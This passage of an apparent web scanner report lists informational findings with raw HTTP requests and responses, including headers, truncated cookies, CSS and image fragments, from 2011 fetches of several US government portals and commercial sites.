| HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: https://office.live.com Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: xid=e359122d-0181-486e Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: mktstate=S=1893731954&U= Set-Cookie: mkt1=norm=en; domain=.live.com; path=/ Set-Cookie: mkt2=marketing=en-us; domain=skydrive.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Sat, 30-Apr-2011 10:40:34 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 12:20:34 GMT Connection: close Content-Length: 178 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="https://office.live </body></html> |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://fortress.wa.gov |
| Path: | /dol/dolprod/vehoffices/ |
| GET /dol/dolprod/vehoffices/ HTTP/1.1 Host: fortress.wa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK connection: close content-type: text/html; charset=utf-8 date: Sat, 30 Apr 2011 12:20:40 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: Microsoft-IIS/6.0 x-old-content-length: 34239 cache-control: private x-powered-by: ASP.NET x-aspnet-version: 2.0.50727 Set-Cookie: PD_STATEFUL_101c5ca4-0734 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> WA Stat ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://iris.custhelp.com |
| Path: | /euf/assets/css/2009 |
| GET /euf/assets/css/2009 Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:46:01 GMT Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT Accept-Ranges: bytes Cache-Control: max-age=900 Expires: Sat, 30 Apr 2011 01:01:01 GMT RNT-Time: D=740 t=1304124361908316 RNT-Machine: 04 X-Cnection: close Content-Type: text/css Set-Cookie: TS8118ae=3d9fb9b0125 Connection: Keep-Alive Content-Length: 4494 #banner-area-menu {width:996px; height:17px; margin:0; padding: 2px 0 0 0; clear:both; background:#000033; position:relative;} #banner-area-menu ul {padding:0; margin:0;} #banner-area-menu u ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://iris.custhelp.com |
| Path: | /euf/assets/css/2009/va |
| GET /euf/assets/css/2009/va Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:46:01 GMT Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT Accept-Ranges: bytes Cache-Control: max-age=900 Expires: Sat, 30 Apr 2011 01:01:01 GMT RNT-Time: D=590 t=1304124361911269 RNT-Machine: 04 X-Cnection: close Content-Type: text/css Set-Cookie: TS8118ae=f571b6d7cae Connection: Keep-Alive Content-Length: 5606 .mainbody { background-color: #C0C0C0; color: #000000; font-family: Verdana, Geneva, sans-serif; font-size: 12px; margin: 0px; padding: 20px 0px 20px 0px; position: relative; text-a ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://iris.custhelp.com |
| Path: | /euf/assets/css/2009/va |
| GET /euf/assets/css/2009/va Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:46:01 GMT Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT Accept-Ranges: bytes Cache-Control: max-age=900 Expires: Sat, 30 Apr 2011 01:01:01 GMT RNT-Time: D=452 t=1304124361848208 RNT-Machine: 05 X-Cnection: close Content-Type: text/css Set-Cookie: TS8118ae=e74f57f4418 Connection: Keep-Alive Content-Length: 2504 /* File............: /va_files/styles/va-user Description.....: Styles available for use in the page content area Version.........: 1.0 Release Date....: December 19, 2005 */ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://iris.custhelp.com |
| Path: | /euf/assets/css/2009 |
| GET /euf/assets/css/2009 Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:46:01 GMT Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT Accept-Ranges: bytes Cache-Control: max-age=900 Expires: Sat, 30 Apr 2011 01:01:01 GMT RNT-Time: D=853 t=1304124361876499 RNT-Machine: 02 X-Cnection: close Content-Type: text/css Set-Cookie: TS8118ae=e01496e8a2a Connection: Keep-Alive Content-Length: 1752 /* CSS Document */ #search-area { text-align: right; float:right; } #search-area form { margin: 0px; padding: 0px; } /* hide the label for the main input field */ #mainSearchForm l ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://iris.custhelp.com |
| Path: | /euf/rightnow/optimized |
| GET /euf/rightnow/optimized Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:46:01 GMT Last-Modified: Thu, 14 Apr 2011 17:22:11 GMT Accept-Ranges: bytes Cache-Control: max-age=2592000 Expires: Mon, 30 May 2011 00:46:01 GMT RNT-Time: D=1790 t=1304124361295257 RNT-Machine: 01 X-Cnection: close Content-Type: text/css Set-Cookie: TS8118ae=232a6f61fd5 Connection: Keep-Alive Content-Length: 18647 body,div,dl,dt,dd,ul,ol table{border-collapse fieldset, ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://iris.custhelp.com |
| Path: | /rnt/rnw/css/enduser.css |
| GET /rnt/rnw/css/enduser.css HTTP/1.1 Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:46:04 GMT Last-Modified: Sun, 09 Jan 2011 05:13:20 GMT Accept-Ranges: bytes Cache-Control: max-age=900 Expires: Sat, 30 Apr 2011 01:01:04 GMT RNT-Time: D=465 t=1304124364543617 RNT-Machine: 02 X-Cnection: close Content-Type: text/css Set-Cookie: TS8118ae=fc55d15bba7 Connection: Keep-Alive Content-Length: 9807 /* ------------------------- * * RNW Enduser Interface Stylesheet (enduser.css) * */ a.fcn { text-decoration: none; color: black } a.fcn:visited ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://iris.custhelp.com |
| Path: | /rnt/rnw/img/enduser/2009 |
| GET /rnt/rnw/img/enduser/2009 Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:59:36 GMT Last-Modified: Sun, 09 Jan 2011 05:13:56 GMT Accept-Ranges: bytes Content-Length: 73 Cache-Control: max-age=900 Expires: Sat, 30 Apr 2011 01:14:36 GMT RNT-Time: D=420 t=1304125176794949 RNT-Machine: 04 X-Cnection: close Content-Type: image/gif Set-Cookie: TS8118ae=6c3373cb5cc GIF89a..........ww....DD| |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://iris.custhelp.com |
| Path: | /rnt/rnw/javascript/2009 |
| GET /rnt/rnw/javascript/2009 Host: iris.custhelp.com Connection: keep-alive Referer: https://iris.custhelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:46:03 GMT Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT Accept-Ranges: bytes Content-Length: 462 Cache-Control: max-age=900 Expires: Sat, 30 Apr 2011 01:01:03 GMT RNT-Time: D=795 t=1304124363945766 RNT-Machine: 01 X-Cnection: close Content-Type: application/x-javascript Set-Cookie: TS8118ae=825257ac4c5 document.write('<script type="text/javascript" src="/rnt/rnw/javascript document.write('<script type="text/javascript" src="/rnt/rnw/javascript ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://iris.va.gov |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 Host: iris.va.gov Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: fsr.s={"v":1,"rid": |
| HTTP/1.0 302 Found Location: http://www.va.gov/iris Connection: Keep-Alive Content-Length: 0 Set-Cookie: TS37e6d1=4bcb8063f21 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://maps-api-ssl |
| Path: | /maps |
| GET /maps HTTP/1.1 Host: maps-api-ssl.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:22:14 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=5331d115efba8054 X-Content-Type-Options: nosniff Server: mfe X-XSS-Protection: 1; mode=block Connection: close <!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://olt.custhelp.com |
| Path: | /cgi-bin/olt.cfg/php |
| GET /cgi-bin/olt.cfg/php Host: olt.custhelp.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Fri, 29 Apr 2011 21:19:11 GMT Server: Apache P3P: policyref="https://olt Set-Cookie: rnw_enduser_login_start RNT-Time: D=82489 t=1304111951723725 RNT-Machine: 01 Vary: Accept-Encoding X-Cnection: close Content-Type: text/html; charset=UTF-8 Content-Length: 11770 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en_US"> <!-- Head ->>>>>>>>>>>>>>>>>>>>>>>> ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://pixel.fetchback |
| Path: | /serve/fb/pdc |
| GET /serve/fb/pdc HTTP/1.1 Host: pixel.fetchback.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 200 OK Date: Fri, 29 Apr 2011 21:18:47 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: cmp=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/ Set-Cookie: uid=1_1304111927 Set-Cookie: kwd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/ Set-Cookie: sit=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/ Set-Cookie: cre=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/ Set-Cookie: bpd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/ Set-Cookie: apd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/ Set-Cookie: scg=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/ Set-Cookie: ppd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/ Set-Cookie: afl=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Fri, 29 Apr 2011 21:18:47 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 <!-- site #0 *not* found --> |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://treas-secure |
| Path: | /eservice_enu/start.swe |
| GET /eservice_enu/start.swe Host: treas-secure.treas.state Connection: keep-alive Referer: https://treas-secure User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 01:40:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: no-cache, must-revalidate pragma: no-cache content-language: en cache-control: no-cache content-type: text/html;charset=UTF-8 set-cookie: _sn=uoRphRmFTo3vYJBL Content-Length: 1403 <html OT='SiebWebMainWindow'> <head> <title>Michigan Department of Treasury Self Service</title> <script language="javascript" <script language="javascript ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.accesskansas |
| Path: | /dissolutions/ |
| GET /dissolutions/ HTTP/1.1 Host: www.accesskansas.org Connection: keep-alive Referer: http://www.kansas.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=98EA5D3BD Location: https://www.accesskansas Content-Type: text/html Content-Length: 0 Date: Sat, 30 Apr 2011 11:22:44 GMT Set-Cookie: BIGipServerAPTCS03 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.accesskansas |
| Path: | /images/footer_images |
| GET /images/footer_images Host: www.accesskansas.org Connection: keep-alive Referer: https://www.accesskansas User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerAPTCS03 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 11:22:49 GMT Server: Apache Last-Modified: Tue, 06 Jan 2009 16:40:52 GMT ETag: "2f1813-ef-12068d00" Accept-Ranges: bytes Content-Length: 239 Connection: close Content-Type: image/gif Set-Cookie: BIGipServerSEC-01 GIF89a$.................. ZU/._[ .)wc ..t..g ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.accesskansas |
| Path: | /images/footer_images |
| GET /images/footer_images Host: www.accesskansas.org Connection: keep-alive Referer: https://www.accesskansas User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerAPTCS03 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 11:22:49 GMT Server: Apache Last-Modified: Thu, 02 Feb 2006 21:37:47 GMT ETag: "2f181a-24b-9b8600c0" Accept-Ranges: bytes Content-Length: 587 Connection: close Content-Type: image/gif Set-Cookie: BIGipServerSEC-01 GIF89a.......fff......fff .V a`....R.....( XR.$.f.4, &.\E=. ...aM9....}......"9 . c&..MO.".<.... ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.accesskansas |
| Path: | /kbc/img/icons/external |
| GET /kbc/img/icons/external Host: www.accesskansas.org Connection: keep-alive Referer: https://www.accesskansas User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerAPTCS03 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 11:22:48 GMT Server: Apache Last-Modified: Mon, 22 Dec 2008 02:31:46 GMT ETag: "371c91-a5-75c9a880" Accept-Ranges: bytes Content-Length: 165 Connection: close Content-Type: image/png Set-Cookie: BIGipServerSEC-01 .PNG . ...IHDR... ... .......?.....PLTEf..3.... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.alabamai |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 Host: www.alabamainteractive Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=abcZcJfPy |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 01:25:32 GMT Server: Apache/1.3.41 (Unix) Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: alabamainteractive.org Content-Length: 205 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /favicon.ico was not found on this server.<P> </BODY></H ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.bbb.org |
| Path: | /online/consumer/cks.aspx |
| GET /online/consumer/cks.aspx HTTP/1.1 Host: www.bbb.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Server: nginx Date: Sat, 30 Apr 2011 12:29:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Cache-Control: private Content-Length: 7622 Set-Cookie: BBB_Cookie=3886160556 Vary: Accept-Encoding, User-Agent <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><title> B ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.colorado.gov |
| Path: | /apps/feedback/servlet |
| GET /apps/feedback/servlet Host: www.colorado.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServer=348127242 |
| HTTP/1.1 302 Found Date: Sat, 30 Apr 2011 12:30:07 GMT Server: Apache Location: http://www.colorado.gov Vary: Accept-Encoding Content-Length: 235 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServer=kB2L <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.colorado ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.humanservices |
| Path: | /Compass.Web/CMHOM.aspx |
| GET /Compass.Web/CMHOM.aspx HTTP/1.1 Host: www.humanservices.state Connection: keep-alive Referer: http://www.budget.state User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:41:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: LangCode=EN; path=/ Set-Cookie: Image=HomePagePhoto_5.jpg Set-Cookie: HTTP_TARGET=https://www Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 52074 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> COMPASS </tit ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.mcafeesecure |
| Path: | /RatingVerify |
| GET /RatingVerify?ref=home Host: www.mcafeesecure.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Server: McAfeeSecure Vary: Accept-Encoding Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Set-Cookie: LANG=EN; path=/; expires=Mon, 05-Jan-2043 23:05:25 GMT Set-Cookie: CAMEFROM=home.mcafee.com Content-Type: text/html; charset=utf-8 Connection: close Date: Fri, 29 Apr 2011 21:18:46 GMT Set-Cookie: resin=1758093834.20480 Content-Length: 10349 <html> <head> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='1568676568',d=document ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail/css |
| GET /content/media/retail/css Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTHID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:38 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=2CDEE64A72C91 Last-Modified: Tue, 26 Apr 2011 20:14:52 GMT ETag: "20c0b9-4221-fa0c6700" Accept-Ranges: bytes Content-Length: 16929 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/css /*START Reset Styles*/html,body,div ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail/css |
| GET /content/media/retail/css Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTHID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:37 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=2C61FEFA72C91 Last-Modified: Mon, 31 Jan 2011 14:30:56 GMT ETag: "1181a9-1e-43892800" Accept-Ranges: bytes Content-Length: 30 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/css /* INTENTIONALLY LEFT BLANK */ |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail/css |
| GET /content/media/retail/css Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTHID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:38 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=2CD9DA4272C91 Last-Modified: Thu, 09 Jul 2009 14:10:28 GMT ETag: "118209-4ab-6af43d00" Accept-Ranges: bytes Content-Length: 1195 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/css #navigation, #extra, #help, #viewPrintableCopyLink, #buttons, #primary-navigation, #global-navigation, #utility-navigation { display:none !important; } * { overflow:visible !important; bord ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail |
| GET /content/media/retail Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:44 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=3007D26E72C91 Last-Modified: Thu, 24 Mar 2011 16:26:56 GMT ETag: "11823c-d6ea-f221d400" Accept-Ranges: bytes Content-Length: 55018 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......Exif..II*.......... ..'.... ..'..Adobe Photoshop CS5 Macintosh.2011-03-24T16 ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail |
| GET /content/media/retail Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTHID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:38 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=2CD9FB4472C91 Last-Modified: Fri, 07 Jul 2006 20:13:02 GMT ETag: "248065-1958-7dd62f80" Accept-Ranges: bytes Content-Length: 6488 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..F.... ......YVW..........$.c$". ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail |
